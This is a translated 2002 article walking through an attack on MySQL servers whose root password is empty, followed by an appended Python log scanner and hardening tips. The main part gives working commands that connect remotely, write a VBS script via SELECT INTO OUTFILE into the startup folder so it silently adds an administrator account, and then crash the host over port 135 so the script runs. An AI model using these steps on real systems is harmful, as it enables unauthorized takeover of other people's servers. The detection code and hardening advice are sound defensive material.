            MySQL root user with an empty password: a method of attack
            www.cshu.net  2002-12-16  fog rain village 

              The day before yesterday I posted about the MySQL root user 
              having an empty password. I also found some methods online for 
              using this hole; they generally write an ASP or PHP back door, 
              which is not only troublesome but also requires guessing the 
              website's directory, and if the other side is not running IIS, 
              are we then left with no way at all? Afterwards I thought hard 
              about an approach of my own, and it succeeded on the several 
              machines with this hole that I tested. I now publish my method 
              of attack as follows: 
              1. Connect to the other side's MySQL server 
              Mysql -u root -h 192.168.0.1 
              The mysql.exe program is in the BIN directory of your MySQL 
              installation. 
              2. See which databases are on the server 
              Mysql>show databases; 
              A default MySQL installation has two databases, MYSQL and TEST; 
              if you see other databases, those were created by the user. 
              3. Enter a database 
              Mysql>use test; 
              We are now in the test database. 
              4. See which tables are in the database we entered 
              Mysql>show tables; 
              By default there are no tables in test. 
              Below is the key part. 
              5. Create a new table in the TEST database 
              Mysql>create table a (cmd text); 
              Good, we have created a new table named a; it holds a single 
              field, named cmd, of type text. 
              6. Insert content into the table 
              Mysql>insert into a values ("set wshshell=createobject 
              (""wscript.shell"")"); 
              Mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 
              zjl317 zjl317 /add" ",0)"); 
              Mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net 
              localgroup Administrators zjl317 /add" ",0)"); 
              Note that the double quotes, the parentheses and the trailing 
              "0" must all be entered! We will use these three commands to 
              build a VBS script! 
              7. Good, now let us see what is in table a 
              Mysql>select * from a; 
              We will see three rows in the table, which are the content we 
              just entered. After confirming that what you entered is correct, 
              we move on to the next step. 
              8. Output the table as a VBS script file 
              Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" the 
              start "menu \\ procedure \\ starts \\a.vbs"; 
              We have written the content into the startup group as a VBS 
              script file! Note the "\" characters. 
              9. Having seen this, everybody will surely have understood: 
              MySQL is being used to output a file that can be executed. Why 
              not use BAT? Because at startup an obvious DOS window would 
              appear, whereas a VBS script can hide the window completely and 
              shows no error prompt either! Originally the script should also 
              have deleted itself automatically after running, but the Chinese 
              directory name really cannot be handled, so I had to give that 
              up! Good, now find a tool to attack 135 so that the server 
              restarts; a few minutes later you will be an administrator.
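
Seen from the defender's side, the sequence above leaves a recognisable trail when the MySQL general query log is enabled: a root connection from another host, followed by a SELECT ... INTO OUTFILE whose target is a script in an auto-run directory. The Python below is an added example, not part of the original article; the log layout, the RISKY_EXT and RISKY_DIR lists, and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed lists for this example; extend them for the hosts you monitor.
RISKY_EXT = (".vbs", ".bat", ".cmd", ".exe", ".js", ".asp", ".php")
RISKY_DIR = ("startup", "inetpub", "wwwroot", "htdocs")
LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")

# Assumed log layout: "<timestamp> <connection id> <Connect|Query> <argument>".
LINE_RE = re.compile(r"^\S+\s+(\d+)\s+(Connect|Query)\s+(.*)$")
OUTFILE_RE = re.compile(r"into\s+(?:outfile|dumpfile)\s+(['\"])(.+?)\1", re.I)

def risky_target(sql):
    """Return the normalised output path if the statement writes a script or
    targets an auto-run or web-served directory, else None."""
    m = OUTFILE_RE.search(sql)
    if not m:
        return None
    # Collapse SQL-escaped backslashes, unify separators, ignore case.
    path = m.group(2).replace("\\\\", "\\").replace("/", "\\").lower()
    in_risky_dir = any(part in RISKY_DIR for part in path.split("\\"))
    return path if path.endswith(RISKY_EXT) or in_risky_dir else None

def scan(log_lines):
    """Tie each risky file write to the account and client host of the
    connection that issued it. Returns a list of alert dicts."""
    sessions, alerts = {}, []
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        conn_id, command, arg = m.groups()
        if command == "Connect":
            user, _, rest = arg.partition("@")
            sessions[conn_id] = (user, rest.split()[0] if rest else "?")
            continue
        path = risky_target(arg)
        if path:
            user, host = sessions.get(conn_id, ("?", "?"))
            alerts.append({"conn": conn_id, "user": user, "host": host,
                           "path": path, "remote": host not in LOCAL_HOSTS})
    return alerts

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = [
    r'2002-12-16T10:00:01 7 Connect root@192.168.0.50 on test',
    r'2002-12-16T10:00:09 7 Query create table a (cmd text)',
    r'2002-12-16T10:00:30 7 Query select * from a into outfile "d:\\example\\startup\\a.vbs"',
    r'2002-12-16T10:01:00 8 Connect backup@localhost on shop',
    r'2002-12-16T10:01:05 8 Query select * from orders into outfile "/var/backup/orders.csv"',
]
```

Detection only narrows the window. Setting a password on root, revoking the FILE privilege from accounts that do not need it, and restricting export locations with the `secure_file_priv` server variable (available in later MySQL versions) remove the file-write primitive itself.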

